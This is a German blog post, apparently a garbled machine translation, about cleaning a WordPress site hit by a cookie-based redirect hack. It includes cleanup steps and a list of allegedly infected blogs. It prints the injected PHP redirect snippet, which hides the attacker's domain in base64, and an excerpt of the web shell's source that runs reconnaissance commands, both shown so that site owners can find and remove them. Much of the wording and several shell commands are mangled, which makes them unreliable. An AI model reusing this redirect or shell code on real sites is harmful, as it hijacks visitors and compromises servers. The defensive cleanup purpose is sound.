Im vergangenen Monat haben wir alle empfangen Warnungen Virus in Blog von einigen Besuchern. Zunächst ignorierte ich die Warnungen, denn ich hatte ziemlich gutes Antivirenprogramm installiert (Kaspersky AV 2009) Und selbst Blog für eine lange Zeit, ich habe noch nie einen Virus alert (vor langer Zeit .. Ich sah etwas suspekt, dass die erste Aktualisierung verschwunden. Schließlich ...).
Langsam begann große Schwankungen zeigen BesucherverkehrNach denen in letzter Zeit stetig und Verkehr gefallen begann mehr und mehr Menschen zu sein, die mir sagen, dass stealthsettings.com €XNUMX es ist virused. Gestern erhielt ich von jemandem ein Screenshot gemacht, wenn die Antivirus ein blockiertes Skript von stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Es war überzeugend genug für mich, dass ich alle Quellen gesucht werden haben. Die erste Idee, die mir in den Sinn kam, war zu tun mehr Stunden die neueste WordPress (2.5.1), aber nicht bevor alle Dateien im alten Skript gelöscht wurden WordPress und zu machen Backup-Datenbank. Dieses Verfahren hat nicht funktioniert und ich habe wahrscheinlich lange gebraucht, um herauszufinden, wo der Fehler war, wenn es mir nicht gesagt hatte. Eugen eine Diskussion Kaffee, er fand ein Link Google und es wäre gut, ihn zu sehen.
MyDigitalLife.info veröffentlichte einen Artikel mit dem Titel: „WordPress Hack: Wiederherstellen und Beheben von Google- und Suchmaschinen- oder No-Cookie-Traffic, der auf Your-Needs.info, AnyResults.Net, Golden-Info.net und andere illegale Websites umgeleitet wird"Das ist das Ende des Fadens wir brauchten.
Es geht um ein ausbeuten de WordPress basierend auf CookiesWas meiner Meinung nach ist es sehr komplex ist und durch das Buch fertig. Clever genug, um ein zu machen SQL Injection Datenbank-Blog, einen Benutzer zu erstellen unsichtbar eine einfache Routinekontrolle in Dashboard->Nutzer, Überprüfen Sie den Server-Ordner und Dateien "beschreibbaren" (Das chmod 777), zu suchen und zu ausführen Gruppe Dateien mit den Rechten oder Wurzel. Ich weiß nicht, was der Name exploitat ist und sehen, dass es nur wenige Artikel über ihn geschrieben, trotz der Tatsache, dass viele Blogs infiziert sind, einschließlich Rumänien. Ok ... Ich werde versuchen, um zu versuchen, Verallgemeinerungen über dieses Virus zu erklären.
Was ist das Virus?
Zuerst die Quellseiten auf Blogs einfügen, Links unsichtbar für Besucher, sondern sichtbar und Wende für Suchmaschinen, insbesondere Google. Dadurch übertragen Page Rank Websites durch den Angreifer angezeigt. Zweitens wird ein anderer eingefügt Codeblöcke URL für Besucher aus Google, Live, Yahoo, ... oder ein RSS-Reader und nicht der Standort in Plätzchen. ein Antivirus erkennt diese umleiten, die Trojan-Clicker.HTML.
Symptome:
Der massive Rückgang der BesucherverkehrBesonders Blogs, wo die meisten Besucher von Google kommen.
Identifikation: (Hier wird das Problem für diejenigen kompliziert, die nicht viel über phpmyadmin, php und linux)
LA. ACHTUNG !!! Zuerst eine Sicherungskopie der Datenbank vornehmen !!!
1. Überprüfen Sie die Quelldateien index.php, header.php, footer.phpDas Thema des Blogs, und sehen, ob es einen Code, der Verschlüsselung verwendet base64 oder enthält "if ($ ser ==" 1? && sizeof ($ _ COOKIE) == 0) "in der Form:
<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>... Oder etwas. Löschen Sie diesen Code!
Klicken Sie auf das Bild ...
Im Screenshot oben habe ich versehentlich ausgewählt und " ". Dieser Code muss bleiben.
2. Verwenden phpMyAdmin und der Datenbank-Tabelle gehen wp_usersWo überprüfen, ob es keine Benutzernamen erstellt am 00:00:00 0000-00-00 (Mögliche im Feld user_login schreiben "WordPress“. Notieren Sie sich die ID dieses Benutzers (ID-Feld) und löschen Sie sie anschließend.
Klicken Sie auf das Bild ...
* Die grüne Linie sollte entfernt werden und behielt seine ID. Im Fall von schläfrigWar ID = 8 .
3. Zum Table wp_usermeta, Wo gelegen und wischen Linien für ID (wo das Feld user_id ID-Wert wird entfernt).
4. In Tabelle wp_option, Gehe zu active_plugins und sehen, was Plugin Verdächtigen aktiviert. Es kann wie Endungen verwendet werden _old.giff, _old.pngg, _old.jpeg, _new.php.giffusw. Kombinationen von Rich-Image-Erweiterungen mit _old und _new.
SELECT * FROM wp_options WHERE option_name = 'active_plugins'Löschen Sie dieses Plugin und gehen Sie dann zum Blog -> Dashboard -> Plugins, wo Sie jedes Plugin deaktivieren und aktivieren.
Klicken Sie auf das Bild um zu sehen, es scheint active_plugins Virus-Datei.
Folgen Sie dem Pfad auf dem FTP oder SSH in active_plugins angezeigt und löschen Sie die Datei vom Server.
5. Auch in phpMyAdmin, in der Tabelle wp_option, Suchen und löschen Sie die Zeile mit "rss_f541b3abd05e7962fcab37737f40fad8"Und"internal_links_cache ".
In internal_links_cache bot verschlüsselte Spam-Links, die in einem Blog angezeigt Code von Google AdsNacken, The Hacker.
6. Wird empfohlen, Kennwort ändern Blog und Anmeldung entfernen Sie alle verdächtigen userele. Aktualisieren Sie auf die neueste Version von WordPress und stellen Sie den Blog so ein, dass neue Benutzer sich nicht mehr registrieren können. Es gibt keinen Verlust… kann auch unbewohnt kommentieren.
Ich habe oben versucht, ein wenig zu erklären, was in einer solchen Situation zu tun ist, um den Blog von diesem Virus zu säubern. Das Problem ist viel schwerwiegender als es scheint und bei weitem nicht gelöst, weil sie verwendet werden Sicherheitslücken Hosting der Web-Server, ist das Blog.
Als erste Maßnahme der Sicherheit, mit Zugang SSH, Machen Sie einige Prüfungen auf dem Server, um zu sehen, ob es Dateien wie * _old * und * _New. * Mit Endungen sind.giff. jpeg,. pngg. jpgg. Diese Dateien müssen gelöscht werden. Wenn Sie eine Datei umbenennen, zum Beispiel. top_right_old.giff in top_right_old.phpWir sehen, dass die Datei genau ist der Exploit-Code-Server.
Einige nützliche Anweisungen zum Überprüfen, Reinigen und Sichern des Servers. (über SSH)
1. cd / tmp und prüfen, ob Ordner wie sind tmpVFlma oder andere Kombinationen asemenatoare Namen und löschen Sie sie. Siehe Screenshot unten, zwei solche Ordner zu mir:
rm-rf foldername
2. Prüfen und beseitigen (ändern chmod-ul) möglichst die Ordner mit Attributen chmod 777
Finden Sie alle beschreibbaren Dateien im aktuellen Verzeichnis: Zu finden. -Type f-perm-2-ls
Sie alle beschreibbaren Verzeichnissen im aktuellen Verzeichnis: Zu finden. Typ d-perm-2-ls
Finden Sie alle beschreibbaren Verzeichnisse und Dateien im aktuellen Verzeichnis: Zu finden. -Perm-2-ls
3. Auf der Suche nach verdächtigen Dateien auf dem Server.
find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"4, WARNUNG! die Dateien, die Bit gesetzt haben SUID si SGID. Diese Dateien ausführen mit den Rechten des Benutzers (Gruppe) oder root, nicht der Benutzer, der die Datei auszuführen. Diese Dateien können auf Root-Kompromittierung führen, wenn Sicherheitsfragen. Wenn Sie nicht die SUID und SGID Dateien mit bit, durchführen 'chmod 0 " sie oder deinstallieren Paket mit ihnen.
Exploit enthält irgendwo in der Quelle ...:
if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}Findet diese Weise ... im Grunde Sicherheitsverletzungen. Ports öffnen Verzeichnis "beschreibbar" und die Gruppe Ausführungsprivilegien files / root.
Zurück mit mehr ...
Einige Blogs infiziert: www.blegoo.com, www.visurat.ro,
fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,
blog.hrmarket.ro, www.nitza.ro,
motorräder.motomag.ro,
emi.brainient.com, www.picsel.ro,
www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,
www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,
dragos.roua.ro, www.artistul.ro/blog/,
www.mirabilismedia.ro/blog, blog.einvest.ro
... Die Liste geht weiter ... eine Menge.
Mit der Google-Suchmaschine können Sie überprüfen, ob ein Blog infiziert ist. Kopieren Einfügen:
Site: www.blegoo.com kaufen
Gute Nacht und gute Arbeit;) Bald denke ich, dass Eugen mit Neuigkeiten auf foreseeable.unpredictable.com kommen wird.
brb :)
BEACHTUNG! Ändern des Themas von WordPress oder Upgrade auf WordPress 2.5.1, ist KEINE Lösung, um diesen Virus loszuwerden.
